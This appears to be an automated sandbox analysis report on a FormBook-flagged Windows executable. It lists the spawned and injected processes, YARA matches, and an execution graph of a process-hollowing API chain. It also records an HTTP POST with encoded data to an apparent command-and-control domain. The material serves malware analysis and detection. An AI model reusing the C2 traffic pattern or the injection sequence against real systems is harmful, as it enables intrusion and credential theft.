                                                                    CF-RAY: 8fff710ae8f68c0f-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                    Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                                                                    Jan 10, 2025 21:33:21.361699104 CET388INData Raw: d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03
                                                                    Data Ascii: bUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.664254104.21.80.1802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:33:23.281539917 CET786OUTPOST /2pcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.aziziyeescortg.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.aziziyeescortg.xyz
                                                                    Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 43 45 31 54 62 6b 6e 73 66 45 41 72 6c 38 36 4b 58 44 2f 74 66 31 39 68 4f 34 62 47 49 35 43 4d 41 4b 43 69 36 39 54 51 30 5a 38 68 4a 66 79 61 47 4d 72 34 6e 6c 72 47 75 35 59 69 6c 49 43 4e 50 33 48 64 6b 75 67 2b 66 45 2b 30 2f 48 2f 34 37 73 67 2b 6e 6e 41 51 31 54 77 6a 4b 67 36 6d 30 6c 53 4d 6f 54 76 56 6a 6d 56 76 74 77 35 35 46 6f 59 66 62 4b 6f 66 2b 44 41 2b 4b 66 59 32 41 50 4c 54 55 67 33 64 77 48 61 63 69 51 73 4a 41 66 36 6f 6a 68 72 76 47 72 7a 6a 67 47 67 6e 68 64 36 6d 50 7a 6a 71 51 32 48 41 65 73 5a 77 44 42 54 5a 36 4d 65 75 41 3d 3d
                                                                    Data Ascii: bJMLqbS=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48CE1TbknsfEArl86KXD/tf19hO4bGI5CMAKCi69TQ0Z8hJfyaGMr4nlrGu5YilICNP3Hdkug+fE+0/H/47sg+nnAQ1TwjKg6m0lSMoTvVjmVvtw55FoYfbKof+DA+KfY2APLTUg3dwHaciQsJAf6ojhrvGrzjgGgnhd6mPzjqQ2HAesZwDBTZ6MeuA==
                                                                    Jan 10, 2025 21:33:23.894311905 CET906INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:33:23 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    Pragma: no-cache
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuMsGH8l6vFK5Eq5yYcRGuy9vgterHnfXiwBRh37xCprA3PUpkvOdmnnNd2yCwTdSSk8qzU1euq0fyuFabVRhKIYp%2BeMJJuLeJlcYGk1pJWhNBclo5JITK02%2BxtsalpHgfypGE9CNneF"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff711afe767d0e-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1980&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                    Data Ascii: f
                                                                    Jan 10, 2025 21:33:23.894999027 CET727INData Raw: 32 62 62 0d 0a 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0
                                                                    Data Ascii: 2bbdTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4C


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:15:30:16
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\NFhRxwbegd.exe"
                                                                    Imagebase:0x360000
                                                                    File size:865'280 bytes
                                                                    MD5 hash:7B4D6F3B6A3B509738048774B20FAD27
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:15:30:34
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\NFhRxwbegd.exe"
                                                                    Imagebase:0xe50000
                                                                    File size:865'280 bytes
                                                                    MD5 hash:7B4D6F3B6A3B509738048774B20FAD27
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:15:30:42
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe"
                                                                    Imagebase:0x490000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:8
                                                                    Start time:15:30:44
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:122'880 bytes
                                                                    MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:9
                                                                    Start time:15:30:58
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe"
                                                                    Imagebase:0x490000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:11
                                                                    Start time:15:31:11
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff799c70000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:10.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:225
                                                                      Total number of Limit Nodes:21
                                                                      execution_graph 26874 6dd66b8 26875 6dd6843 26874->26875 26877 6dd66de 26874->26877 26877->26875 26878 6dd41bc 26877->26878 26879 6dd6938 PostMessageW 26878->26879 26880 6dd69a4 26879->26880 26880->26877 26836 dfd4d8 26837 dfd51e GetCurrentProcess 26836->26837 26839 dfd569 26837->26839 26840 dfd570 GetCurrentThread 26837->26840 26839->26840 26841 dfd5ad GetCurrentProcess 26840->26841 26842 dfd5a6 26840->26842 26843 dfd5e3 26841->26843 26842->26841 26844 dfd60b GetCurrentThreadId 26843->26844 26845 dfd63c 26844->26845 26889 df4668 26890 df467a 26889->26890 26891 df4686 26890->26891 26895 df4779 26890->26895 26900 df3e28 26891->26900 26893 df46a5 26896 df479d 26895->26896 26904 df4888 26896->26904 26908 df4878 26896->26908 26901 df3e33 26900->26901 26916 df5c68 26901->26916 26903 df6ff6 26903->26893 26906 df48af 26904->26906 26905 df498c 26906->26905 26912 df44b0 26906->26912 26910 df4888 26908->26910 26909 df498c 26909->26909 26910->26909 26911 df44b0 CreateActCtxA 26910->26911 26911->26909 26913 df5918 CreateActCtxA 26912->26913 26915 df59db 26913->26915 26917 df5c73 26916->26917 26920 df5c88 26917->26920 26919 df7195 26919->26903 26921 df5c93 26920->26921 26924 df5cb8 26921->26924 26923 df727a 26923->26919 26925 df5cc3 26924->26925 26928 df5ce8 26925->26928 26927 df736d 26927->26923 26929 df5cf3 26928->26929 26931 df866b 26929->26931 26935 dfad19 26929->26935 26930 df86a9 26930->26927 26931->26930 26940 dfce00 26931->26940 26946 dfce0f 26931->26946 26936 dfad28 26935->26936 26951 dfad41 26936->26951 26956 dfad50 26936->26956 26937 dfad2e 26937->26931 26941 dfcdb4 26940->26941 26942 dfce06 26940->26942 26941->26930 26943 dfce98 26942->26943 26970 dfcfc0 26942->26970 26974 dfcfb0 26942->26974 26943->26930 26947 dfce31 26946->26947 26948 dfce55 26947->26948 26949 dfcfc0 2 API calls 26947->26949 26950 dfcfb0 2 API calls 26947->26950 26948->26930 26949->26948 26950->26948 26952 dfad50 26951->26952 26960 dfae48 26952->26960 26965 dfae37 26952->26965 26953 dfad5f 26953->26937 26958 dfae48 GetModuleHandleW 26956->26958 26959 dfae37 GetModuleHandleW 26956->26959 26957 dfad5f 26957->26937 26958->26957 26959->26957 26961 dfae7c 26960->26961 26962 dfae59 26960->26962 26961->26953 26962->26961 26963 dfb080 GetModuleHandleW 26962->26963 26964 dfb0ad 26963->26964 26964->26953 26967 dfae48 26965->26967 26966 dfae7c 26966->26953 26967->26966 26968 dfb080 GetModuleHandleW 26967->26968 26969 dfb0ad 26968->26969 26969->26953 26971 dfcfcd 26970->26971 26972 dfd007 26971->26972 26978 dfb820 26971->26978 26972->26943 26975 dfcfc0 26974->26975 26976 dfd007 26975->26976 26977 dfb820 2 API calls 26975->26977 26976->26943 26977->26976 26979 dfb82b 26978->26979 26980 dfdd18 26979->26980 26982 dfd124 26979->26982 26983 dfd12f 26982->26983 26984 df5ce8 2 API calls 26983->26984 26985 dfdd87 26984->26985 26985->26980 26885 6de59b4 26887 6de7cb8 VirtualProtect 26885->26887 26888 6de7cc0 VirtualProtect 26885->26888 26886 6de59e5 26887->26886 26888->26886 26846 6de6095 26850 6de7cb8 26846->26850 26854 6de7cc0 26846->26854 26847 6de60a6 26851 6de7cc0 VirtualProtect 26850->26851 26853 6de7d42 26851->26853 26853->26847 26855 6de7d08 VirtualProtect 26854->26855 26856 6de7d42 26855->26856 26856->26847 26986 6dd4c63 26987 6dd4c6d 26986->26987 26988 6dd4b84 26986->26988 26993 6dd5470 26987->26993 26998 6dd5480 26987->26998 27002 6dd54e6 26987->27002 26989 6dd4cda 26994 6dd545a 26993->26994 26995 6dd547f 26993->26995 26994->26989 27008 6dd57a1 26995->27008 26996 6dd54a2 26996->26989 26999 6dd549a 26998->26999 27001 6dd57a1 12 API calls 26999->27001 27000 6dd54a2 27000->26989 27001->27000 27003 6dd5474 27002->27003 27006 6dd54e9 27002->27006 27004 6dd545a 27003->27004 27007 6dd57a1 12 API calls 27003->27007 27004->26989 27005 6dd54a2 27005->26989 27006->26989 27007->27005 27009 6dd57af 27008->27009 27010 6dd578a 27008->27010 27026 6dd58bc 27009->27026 27031 6dd60c3 27009->27031 27036 6dd58e7 27009->27036 27042 6dd5d04 27009->27042 27047 6dd5b8b 27009->27047 27051 6dd5da8 27009->27051 27055 6dd5ae9 27009->27055 27060 6dd6169 27009->27060 27064 6dd5f8c 27009->27064 27069 6dd61ad 27009->27069 27074 6dd5a2d 27009->27074 27082 6dd5c33 27009->27082 27087 6dd5914 27009->27087 27092 6dd611e 27009->27092 27010->26996 27011 6dd57d7 27011->26996 27027 6dd58c2 27026->27027 27097 6dd465c 27027->27097 27101 6dd4668 27027->27101 27032 6dd5d22 27031->27032 27033 6dd61ba 27032->27033 27105 6dd3d98 27032->27105 27109 6dd3d93 27032->27109 27038 6dd58cf 27036->27038 27037 6dd58df 27037->27011 27038->27037 27040 6dd465c CreateProcessA 27038->27040 27041 6dd4668 CreateProcessA 27038->27041 27039 6dd5a0e 27039->27011 27040->27039 27041->27039 27043 6dd5d0a 27042->27043 27044 6dd61ba 27043->27044 27045 6dd3d98 ResumeThread 27043->27045 27046 6dd3d93 ResumeThread 27043->27046 27045->27043 27046->27043 27113 6dd3fdb 27047->27113 27117 6dd3fe0 27047->27117 27048 6dd5bb2 27048->27011 27121 6dd3e48 27051->27121 27125 6dd3e43 27051->27125 27052 6dd5dc2 27052->27011 27056 6dd5f0e 27055->27056 27058 6dd3fdb WriteProcessMemory 27056->27058 27059 6dd3fe0 WriteProcessMemory 27056->27059 27057 6dd622b 27057->27011 27058->27057 27059->27057 27129 6dd40c8 27060->27129 27133 6dd40d0 27060->27133 27061 6dd618e 27065 6dd629c 27064->27065 27067 6dd3e48 Wow64SetThreadContext 27065->27067 27068 6dd3e43 Wow64SetThreadContext 27065->27068 27066 6dd62b7 27067->27066 27068->27066 27070 6dd61ba 27069->27070 27071 6dd6135 27069->27071 27071->27069 27072 6dd3d98 ResumeThread 27071->27072 27073 6dd3d93 ResumeThread 27071->27073 27072->27071 27073->27071 27075 6dd5a36 27074->27075 27075->27074 27076 6dd5c7d 27075->27076 27077 6dd5c5c 27075->27077 27137 6dd3f1b 27075->27137 27141 6dd3f20 27075->27141 27080 6dd3fdb WriteProcessMemory 27077->27080 27081 6dd3fe0 WriteProcessMemory 27077->27081 27080->27076 27081->27076 27083 6dd5c5c 27082->27083 27085 6dd3fdb WriteProcessMemory 27083->27085 27086 6dd3fe0 WriteProcessMemory 27083->27086 27084 6dd5c7d 27085->27084 27086->27084 27088 6dd5927 27087->27088 27090 6dd465c CreateProcessA 27088->27090 27091 6dd4668 CreateProcessA 27088->27091 27089 6dd5a0e 27089->27011 27090->27089 27091->27089 27093 6dd6124 27092->27093 27094 6dd61ba 27093->27094 27095 6dd3d98 ResumeThread 27093->27095 27096 6dd3d93 ResumeThread 27093->27096 27095->27093 27096->27093 27098 6dd465f CreateProcessA 27097->27098 27100 6dd48b3 27098->27100 27102 6dd46f1 CreateProcessA 27101->27102 27104 6dd48b3 27102->27104 27106 6dd3dd8 ResumeThread 27105->27106 27108 6dd3e09 27106->27108 27108->27032 27110 6dd3dd8 ResumeThread 27109->27110 27112 6dd3e09 27110->27112 27112->27032 27114 6dd3fe0 WriteProcessMemory 27113->27114 27116 6dd407f 27114->27116 27116->27048 27118 6dd4028 WriteProcessMemory 27117->27118 27120 6dd407f 27118->27120 27120->27048 27122 6dd3e8d Wow64SetThreadContext 27121->27122 27124 6dd3ed5 27122->27124 27124->27052 27126 6dd3e8d Wow64SetThreadContext 27125->27126 27128 6dd3ed5 27126->27128 27128->27052 27130 6dd40d1 ReadProcessMemory 27129->27130 27132 6dd415f 27130->27132 27132->27061 27134 6dd411b ReadProcessMemory 27133->27134 27136 6dd415f 27134->27136 27136->27061 27138 6dd3f20 VirtualAllocEx 27137->27138 27140 6dd3f9d 27138->27140 27140->27075 27142 6dd3f60 VirtualAllocEx 27141->27142 27144 6dd3f9d 27142->27144 27144->27075 26869 6de66c1 26870 6de66c4 26869->26870 26871 6de6729 26870->26871 26872 6de7cb8 VirtualProtect 26870->26872 26873 6de7cc0 VirtualProtect 26870->26873 26872->26870 26873->26870 27145 dfd720 DuplicateHandle 27146 dfd7b6 27145->27146

                                                                      Executed Functions

                                                                      Function 06DE2BE0 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 44 6de2be0-6de2be6 45 6de2c38-6de2c3c 44->45 46 6de2be8-6de2bea 44->46 47 6de2c3e-6de2c63 45->47 48 6de2c64-6de2ca0 45->48 46->45 47->48 49 6de2cc4-6de2d1d 48->49 50 6de2ca2-6de2caa 48->50 54 6de2d1f 49->54 55 6de2d24-6de2d62 call 6de32a0 49->55 50->49 54->55 57 6de2d68 55->57 58 6de2d6f-6de2d8b 57->58 59 6de2d8d 58->59 60 6de2d94-6de2d95 58->60 59->57 59->60 61 6de30eb-6de30f2 59->61 62 6de2fbd-6de2fc1 59->62 63 6de2e7d-6de2e9b 59->63 64 6de2d9a-6de2d9e 59->64 65 6de2ddb-6de2de4 59->65 66 6de307b-6de30a0 59->66 67 6de2f73-6de2f88 59->67 68 6de2e10-6de2e28 59->68 69 6de2eef-6de2f01 59->69 70 6de30cf-6de30e6 59->70 71 6de2f8d-6de2f91 59->71 72 6de2fed-6de2ff9 59->72 73 6de2eca-6de2eea 59->73 74 6de2f2b-6de2f42 59->74 75 6de2f06-6de2f26 59->75 76 6de2e66-6de2e78 59->76 77 6de2f47-6de2f5c 59->77 78 6de2dc7-6de2dd9 59->78 79 6de30a5-6de30b1 59->79 80 6de2ea0-6de2eac 59->80 81 6de2f61-6de2f6e 59->81 60->61 96 6de2fd4-6de2fdb 62->96 97 6de2fc3-6de2fd2 62->97 63->58 86 6de2da0-6de2daf 64->86 87 6de2db1-6de2db8 64->87 88 6de2de6-6de2df5 65->88 89 6de2df7-6de2dfe 65->89 66->58 67->58 90 6de2e2f-6de2e45 68->90 91 6de2e2a 68->91 69->58 70->58 92 6de2fa4-6de2fab 71->92 93 6de2f93-6de2fa2 71->93 82 6de2ffb 72->82 83 6de3000-6de3016 72->83 73->58 74->58 75->58 76->58 77->58 78->58 94 6de30b8-6de30ca 79->94 95 6de30b3 79->95 84 6de2eae 80->84 85 6de2eb3-6de2ec5 80->85 81->58 82->83 110 6de301d-6de3033 83->110 111 6de3018 83->111 84->85 85->58 101 6de2dbf-6de2dc5 86->101 87->101 103 6de2e05-6de2e0b 88->103 89->103 112 6de2e4c-6de2e61 90->112 113 6de2e47 90->113 91->90 105 6de2fb2-6de2fb8 92->105 93->105 94->58 95->94 98 6de2fe2-6de2fe8 96->98 97->98 98->58 101->58 103->58 105->58 116 6de303a-6de3050 110->116 117 6de3035 110->117 111->110 112->58 113->112 119 6de3057-6de3076 116->119 120 6de3052 116->120 117->116 119->58 120->119
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: 3ef13117e124ca67ce76a2f916dcd62daf0523b914bda3e2e261cc546fc5211c
                                                                      • Instruction ID: 55811ee322af4e8e22705c662063231e5ab9798e83c362f0e970813539f46ae6
                                                                      • Opcode Fuzzy Hash: 3ef13117e124ca67ce76a2f916dcd62daf0523b914bda3e2e261cc546fc5211c
                                                                      • Instruction Fuzzy Hash: 49E1AE74D04609DFDB14DFA9C8818AEFBB6FF89310B158569D981AB218D734DA42CFD0
                                                                      Function 06DE2CAF Relevance: 4.1, Strings: 3, Instructions: 308COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 123 6de2caf-6de2d1d 128 6de2d1f 123->128 129 6de2d24-6de2d62 call 6de32a0 123->129 128->129 131 6de2d68 129->131 132 6de2d6f-6de2d8b 131->132 133 6de2d8d 132->133 134 6de2d94-6de2d95 132->134 133->131 133->134 135 6de30eb-6de30f2 133->135 136 6de2fbd-6de2fc1 133->136 137 6de2e7d-6de2e9b 133->137 138 6de2d9a-6de2d9e 133->138 139 6de2ddb-6de2de4 133->139 140 6de307b-6de30a0 133->140 141 6de2f73-6de2f88 133->141 142 6de2e10-6de2e28 133->142 143 6de2eef-6de2f01 133->143 144 6de30cf-6de30e6 133->144 145 6de2f8d-6de2f91 133->145 146 6de2fed-6de2ff9 133->146 147 6de2eca-6de2eea 133->147 148 6de2f2b-6de2f42 133->148 149 6de2f06-6de2f26 133->149 150 6de2e66-6de2e78 133->150 151 6de2f47-6de2f5c 133->151 152 6de2dc7-6de2dd9 133->152 153 6de30a5-6de30b1 133->153 154 6de2ea0-6de2eac 133->154 155 6de2f61-6de2f6e 133->155 134->135 170 6de2fd4-6de2fdb 136->170 171 6de2fc3-6de2fd2 136->171 137->132 160 6de2da0-6de2daf 138->160 161 6de2db1-6de2db8 138->161 162 6de2de6-6de2df5 139->162 163 6de2df7-6de2dfe 139->163 140->132 141->132 164 6de2e2f-6de2e45 142->164 165 6de2e2a 142->165 143->132 144->132 166 6de2fa4-6de2fab 145->166 167 6de2f93-6de2fa2 145->167 156 6de2ffb 146->156 157 6de3000-6de3016 146->157 147->132 148->132 149->132 150->132 151->132 152->132 168 6de30b8-6de30ca 153->168 169 6de30b3 153->169 158 6de2eae 154->158 159 6de2eb3-6de2ec5 154->159 155->132 156->157 184 6de301d-6de3033 157->184 185 6de3018 157->185 158->159 159->132 175 6de2dbf-6de2dc5 160->175 161->175 177 6de2e05-6de2e0b 162->177 163->177 186 6de2e4c-6de2e61 164->186 187 6de2e47 164->187 165->164 179 6de2fb2-6de2fb8 166->179 167->179 168->132 169->168 172 6de2fe2-6de2fe8 170->172 171->172 172->132 175->132 177->132 179->132 190 6de303a-6de3050 184->190 191 6de3035 184->191 185->184 186->132 187->186 193 6de3057-6de3076 190->193 194 6de3052 190->194 191->190 193->132 194->193
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: 7631c90cb91d5570c113bcb3aa79d63070e40c4340548e12206a0f6fa7d88d43
                                                                      • Instruction ID: 53a71b60d593ac82324bc72337588ca078ade6c21c94a2c2c735c4b3a8acc2fa
                                                                      • Opcode Fuzzy Hash: 7631c90cb91d5570c113bcb3aa79d63070e40c4340548e12206a0f6fa7d88d43
                                                                      • Instruction Fuzzy Hash: C5D16974E0420ADFDB54DFA5C4858AEFBB6FF89300B158466D552AB218D734DA42CFD0
                                                                      Function 06DE2CF8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
